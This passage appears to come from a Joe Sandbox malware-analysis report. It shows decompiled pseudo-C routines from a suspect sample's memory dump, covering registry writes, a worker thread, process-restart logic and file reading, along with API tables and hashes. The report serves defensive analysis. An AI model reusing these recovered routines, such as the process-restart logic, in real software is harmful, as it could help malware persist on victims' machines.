                                                                                                                                                                                                                                                                          					_t48 = _v29 & 0x000000ff;
                                                                                                                                                                                                                                                                          					if((_v29 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						_v72 = 0x10;
                                                                                                                                                                                                                                                                          						E04009BD0(_t48,  &_v68, 0x10);
                                                                                                                                                                                                                                                                          						RegSetValueExA(_v20, _v24, 0, 3,  &_v68, 0x10);
                                                                                                                                                                                                                                                                          						_v9 = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					RegCloseKey(_v20); // executed
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v9;
                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                          0x04005e36
                                                                                                                                                                                                                                                                          0x04005e3a
                                                                                                                                                                                                                                                                          0x04005e3f
                                                                                                                                                                                                                                                                          0x04005e42
                                                                                                                                                                                                                                                                          0x04005e48
                                                                                                                                                                                                                                                                          0x04005e4b
                                                                                                                                                                                                                                                                          0x04005e5b
                                                                                                                                                                                                                                                                          0x04005e5d
                                                                                                                                                                                                                                                                          0x04005e5d
                                                                                                                                                                                                                                                                          0x04005e64
                                                                                                                                                                                                                                                                          0x04005e7e
                                                                                                                                                                                                                                                                          0x04005e86
                                                                                                                                                                                                                                                                          0x04005e8c
                                                                                                                                                                                                                                                                          0x04005e93
                                                                                                                                                                                                                                                                          0x04005e9a
                                                                                                                                                                                                                                                                          0x04005eb2
                                                                                                                                                                                                                                                                          0x04005eba
                                                                                                                                                                                                                                                                          0x04005ec2
                                                                                                                                                                                                                                                                          0x04005ecc
                                                                                                                                                                                                                                                                          0x04005ed6
                                                                                                                                                                                                                                                                          0x04005ed6
                                                                                                                                                                                                                                                                          0x04005ecc
                                                                                                                                                                                                                                                                          0x04005edc
                                                                                                                                                                                                                                                                          0x04005ee2
                                                                                                                                                                                                                                                                          0x04005ee4
                                                                                                                                                                                                                                                                          0x04005ef1
                                                                                                                                                                                                                                                                          0x04005f0b
                                                                                                                                                                                                                                                                          0x04005f11
                                                                                                                                                                                                                                                                          0x04005f11
                                                                                                                                                                                                                                                                          0x04005f19
                                                                                                                                                                                                                                                                          0x04005f19
                                                                                                                                                                                                                                                                          0x04005f25

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 04005E7E
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005EB2
                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,?), ref: 04005ED6
                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 04005F0B
                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 04005F19
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                                                          • API String ID: 647993726-227171996
                                                                                                                                                                                                                                                                          • Opcode ID: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
                                                                                                                                                                                                                                                                          • Instruction ID: 89e6ea7d5f7cd1f3b8914b5f239817843937aaeba4a6099ce7b548add1ef5737
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A317370A04249AFEF04CFD4D855BFFBBB9AB44704F14815CEA40B7281D7B96A00CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                                                          			E04004AC0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                                                                          					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                                                                          						if( *((intOrPtr*)(_v8 + 8)) <= 0 || WaitForSingleObject( *(_v8 + 0x24), 0x64) != 0x102) {
                                                                                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                                                                                          							Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						EnterCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						_v12 = 0;
                                                                                                                                                                                                                                                                          						_t31 = E04008250( *((intOrPtr*)(_v8 + 4)),  *((intOrPtr*)(_v8 + 8)),  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                                                          						_t50 = _t50 + 0x10;
                                                                                                                                                                                                                                                                          						_v16 = _t31;
                                                                                                                                                                                                                                                                          						LeaveCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                          						if(_v16 <= 0) {
                                                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						E040062B0(_v20, _v16); // executed
                                                                                                                                                                                                                                                                          						VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          						SetEvent( *(_v8 + 0x24));
                                                                                                                                                                                                                                                                          						__imp__CoUninitialize();
                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				L8:
                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x04004ac9
                                                                                                                                                                                                                                                                          0x04004ad0
                                                                                                                                                                                                                                                                          0x04004ad8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004ade
                                                                                                                                                                                                                                                                          0x04004ae5
                                                                                                                                                                                                                                                                          0x04004b80
                                                                                                                                                                                                                                                                          0x04004b85
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004b85
                                                                                                                                                                                                                                                                          0x04004b08
                                                                                                                                                                                                                                                                          0x04004b0e
                                                                                                                                                                                                                                                                          0x04004b15
                                                                                                                                                                                                                                                                          0x04004b32
                                                                                                                                                                                                                                                                          0x04004b37
                                                                                                                                                                                                                                                                          0x04004b3a
                                                                                                                                                                                                                                                                          0x04004b44
                                                                                                                                                                                                                                                                          0x04004b4e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004b58
                                                                                                                                                                                                                                                                          0x04004b6b
                                                                                                                                                                                                                                                                          0x04004b78
                                                                                                                                                                                                                                                                          0x04004b90
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004b90
                                                                                                                                                                                                                                                                          0x04004ade
                                                                                                                                                                                                                                                                          0x04004b96
                                                                                                                                                                                                                                                                          0x04004b9b

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04004AD8
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 04004AF4
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(-0000000C), ref: 04004B08
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(-0000000C), ref: 04004B44
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04004B6B
                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 04004B78
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 04004B85
                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 04004B90
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepUninitializeVirtualWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3462651527-0
                                                                                                                                                                                                                                                                          • Opcode ID: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
                                                                                                                                                                                                                                                                          • Instruction ID: a8de0d0852ad7639ac4a8efdad63c4b5a832734fa442b81c8ae14f5e2abf7ac4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C213075A00208EFE704EF94D958FAEB7B9EB48305F10C658E605B7281D739EE84CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                                                          			E040077B0(void** _a4) {
                                                                                                                                                                                                                                                                          				void** _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				void** _v28;
                                                                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                          					_v12 = 0x96;
                                                                                                                                                                                                                                                                          					_v16 = 0x1388;
                                                                                                                                                                                                                                                                          					_v8 = _a4;
                                                                                                                                                                                                                                                                          					if( *_v8 != 0) {
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						while(_v20 < 0x96) {
                                                                                                                                                                                                                                                                          							_v24 = 0;
                                                                                                                                                                                                                                                                          							_t37 = GetExitCodeProcess(_v8[3],  &_v24); // executed
                                                                                                                                                                                                                                                                          							if(_t37 == 0) {
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								if(_v24 != 0x103) {
                                                                                                                                                                                                                                                                          									CloseHandle(_v8[3]);
                                                                                                                                                                                                                                                                          									Sleep(0x7530);
                                                                                                                                                                                                                                                                          									_t40 = E04002070( *_v8);
                                                                                                                                                                                                                                                                          									_t60 = _t60 + 4;
                                                                                                                                                                                                                                                                          									_v8[3] = _t40;
                                                                                                                                                                                                                                                                          									if(_v8[3] != 0) {
                                                                                                                                                                                                                                                                          										_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                          										if((_v8[2] & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                          											E04002510(_v8[3], 0x400e290);
                                                                                                                                                                                                                                                                          											_t60 = _t60 + 8;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										goto L11;
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                          									L11:
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						VirtualFree( *_v8, 0, 0x8000);
                                                                                                                                                                                                                                                                          						_v28 = _v8;
                                                                                                                                                                                                                                                                          						E040097C0(_v28);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                          0x040077ba
                                                                                                                                                                                                                                                                          0x040077c2
                                                                                                                                                                                                                                                                          0x040077c8
                                                                                                                                                                                                                                                                          0x040077cf
                                                                                                                                                                                                                                                                          0x040077d9
                                                                                                                                                                                                                                                                          0x040077e2
                                                                                                                                                                                                                                                                          0x040077e8
                                                                                                                                                                                                                                                                          0x040077ef
                                                                                                                                                                                                                                                                          0x040077fc
                                                                                                                                                                                                                                                                          0x0400780e
                                                                                                                                                                                                                                                                          0x04007816
                                                                                                                                                                                                                                                                          0x04007818
                                                                                                                                                                                                                                                                          0x0400781f
                                                                                                                                                                                                                                                                          0x04007835
                                                                                                                                                                                                                                                                          0x04007840
                                                                                                                                                                                                                                                                          0x0400784c
                                                                                                                                                                                                                                                                          0x04007851
                                                                                                                                                                                                                                                                          0x04007857
                                                                                                                                                                                                                                                                          0x04007861
                                                                                                                                                                                                                                                                          0x0400786d
                                                                                                                                                                                                                                                                          0x04007879
                                                                                                                                                                                                                                                                          0x04007887
                                                                                                                                                                                                                                                                          0x0400788c
                                                                                                                                                                                                                                                                          0x0400788c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007863
                                                                                                                                                                                                                                                                          0x04007821
                                                                                                                                                                                                                                                                          0x04007826
                                                                                                                                                                                                                                                                          0x0400788f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007893
                                                                                                                                                                                                                                                                          0x0400781f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007816
                                                                                                                                                                                                                                                                          0x040078a5
                                                                                                                                                                                                                                                                          0x040078ae
                                                                                                                                                                                                                                                                          0x040078b5
                                                                                                                                                                                                                                                                          0x040078ba
                                                                                                                                                                                                                                                                          0x040078bd
                                                                                                                                                                                                                                                                          0x040078bd
                                                                                                                                                                                                                                                                          0x040078c8

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 040077C2
                                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 0400780E
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 04007826
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00001388), ref: 04007835
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00007530), ref: 04007840
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 040078A5
                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 040078BD
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessUninitializeVirtual
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2326833528-0
                                                                                                                                                                                                                                                                          • Opcode ID: 40971a79621a4715f304bef9d1a112be756b69aca4ab6b623c127bbca2746a66
                                                                                                                                                                                                                                                                          • Instruction ID: 786529089a386be0191f5a1a0158813805cafbe076d78358bbe760b2cac44d20
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40971a79621a4715f304bef9d1a112be756b69aca4ab6b623c127bbca2746a66
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62318E74A00209EBFB54CF90C848BAEB7B1FB44305F14C668E905B7280D779BE40CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005CD0(CHAR* _a4) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && lstrlenA(_a4) >= 4) {
                                                                                                                                                                                                                                                                          					_t29 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                          					_v12 = _t29;
                                                                                                                                                                                                                                                                          					if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                          						_v16 = GetFileSize(_v12, 0);
                                                                                                                                                                                                                                                                          						if(_v16 > 0) {
                                                                                                                                                                                                                                                                          							_t34 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          							_v20 = _t34;
                                                                                                                                                                                                                                                                          							if(_v20 != 0) {
                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                          								ReadFile(_v12, _v20, _v16,  &_v24, 0); // executed
                                                                                                                                                                                                                                                                          								if(_v24 == _v16) {
                                                                                                                                                                                                                                                                          									_v8 = E040016F0(_v20, _v16);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						FindCloseChangeNotification(_v12); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                          0x04005cd6
                                                                                                                                                                                                                                                                          0x04005ce1
                                                                                                                                                                                                                                                                          0x04005d10
                                                                                                                                                                                                                                                                          0x04005d16
                                                                                                                                                                                                                                                                          0x04005d1d
                                                                                                                                                                                                                                                                          0x04005d2f
                                                                                                                                                                                                                                                                          0x04005d36
                                                                                                                                                                                                                                                                          0x04005d45
                                                                                                                                                                                                                                                                          0x04005d4b
                                                                                                                                                                                                                                                                          0x04005d52
                                                                                                                                                                                                                                                                          0x04005d54
                                                                                                                                                                                                                                                                          0x04005d6d
                                                                                                                                                                                                                                                                          0x04005d79
                                                                                                                                                                                                                                                                          0x04005d8b
                                                                                                                                                                                                                                                                          0x04005d8b
                                                                                                                                                                                                                                                                          0x04005d99
                                                                                                                                                                                                                                                                          0x04005d99
                                                                                                                                                                                                                                                                          0x04005d52
                                                                                                                                                                                                                                                                          0x04005da3
                                                                                                                                                                                                                                                                          0x04005da3
                                                                                                                                                                                                                                                                          0x04005d1d
                                                                                                                                                                                                                                                                          0x04005daf

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005CEB
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005D10
                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 04005D29
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005D45
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04005D6D
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04005D99
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 04005DA3
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$Virtual$AllocChangeCloseCreateFindFreeNotificationReadSizelstrlen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 443218420-0
                                                                                                                                                                                                                                                                          • Opcode ID: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
                                                                                                                                                                                                                                                                          • Instruction ID: 1c3b7df952a912c4f86c12ad70d9a091debb45511137cc5b62942badbf1a5776
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7021EC75A00208FBEB64DFA4DC49BAE77B5EB48705F108659F615BB2C0C778AA80CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005B50(CHAR* _a4, char* _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                          				char* _v36;
                                                                                                                                                                                                                                                                          				char* _v40;
                                                                                                                                                                                                                                                                          				void* _v44;
                                                                                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                          					_v32 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                          					_v28 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                          					_v24 = 0;
                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                          					while(_v24 < _v28) {
                                                                                                                                                                                                                                                                          						_v36 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                          						if(_v36 != 0) {
                                                                                                                                                                                                                                                                          							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                          							_v24 = _v36 - _a4 + _v32;
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v20 = _v16 * 0x28;
                                                                                                                                                                                                                                                                          					_t69 = VirtualAlloc(0, _v20, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v12 = _t69;
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                                                          						while(_v24 < _v28) {
                                                                                                                                                                                                                                                                          							_v40 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                          							if(_v40 != 0) {
                                                                                                                                                                                                                                                                          								lstrcpynA(_v12 + _v16 * 0x28,  &(_a4[_v24]), _v40 -  &(_a4[_v24]) + 1);
                                                                                                                                                                                                                                                                          								_v24 = _v40 - _a4 + _v32;
                                                                                                                                                                                                                                                                          								_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                          								_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          								 *_a12 = _v12;
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_a16 != 0) {
                                                                                                                                                                                                                                                                          							_v44 = VirtualAlloc(0, _v20, 0x3000, 4);
                                                                                                                                                                                                                                                                          							if(_v44 != 0) {
                                                                                                                                                                                                                                                                          								E04007B70(_v44, _v12, _v20);
                                                                                                                                                                                                                                                                          								 *_a16 = _v44;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                          0x04005b56
                                                                                                                                                                                                                                                                          0x04005b61
                                                                                                                                                                                                                                                                          0x04005b85
                                                                                                                                                                                                                                                                          0x04005b92
                                                                                                                                                                                                                                                                          0x04005b95
                                                                                                                                                                                                                                                                          0x04005b9c
                                                                                                                                                                                                                                                                          0x04005ba3
                                                                                                                                                                                                                                                                          0x04005bbc
                                                                                                                                                                                                                                                                          0x04005bc3
                                                                                                                                                                                                                                                                          0x04005bcb
                                                                                                                                                                                                                                                                          0x04005bd7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005bde
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005bc3
                                                                                                                                                                                                                                                                          0x04005be6
                                                                                                                                                                                                                                                                          0x04005bf6
                                                                                                                                                                                                                                                                          0x04005bfc
                                                                                                                                                                                                                                                                          0x04005c03
                                                                                                                                                                                                                                                                          0x04005c09
                                                                                                                                                                                                                                                                          0x04005c10
                                                                                                                                                                                                                                                                          0x04005c17
                                                                                                                                                                                                                                                                          0x04005c30
                                                                                                                                                                                                                                                                          0x04005c37
                                                                                                                                                                                                                                                                          0x04005c59
                                                                                                                                                                                                                                                                          0x04005c68
                                                                                                                                                                                                                                                                          0x04005c71
                                                                                                                                                                                                                                                                          0x04005c7a
                                                                                                                                                                                                                                                                          0x04005c87
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005c87
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005c37
                                                                                                                                                                                                                                                                          0x04005c8f
                                                                                                                                                                                                                                                                          0x04005ca4
                                                                                                                                                                                                                                                                          0x04005cab
                                                                                                                                                                                                                                                                          0x04005cb9
                                                                                                                                                                                                                                                                          0x04005cc7
                                                                                                                                                                                                                                                                          0x04005cc7
                                                                                                                                                                                                                                                                          0x04005cab
                                                                                                                                                                                                                                                                          0x04005c8f
                                                                                                                                                                                                                                                                          0x04005c03
                                                                                                                                                                                                                                                                          0x04005ccf

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005B7F
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005B8C
                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 04005BB6
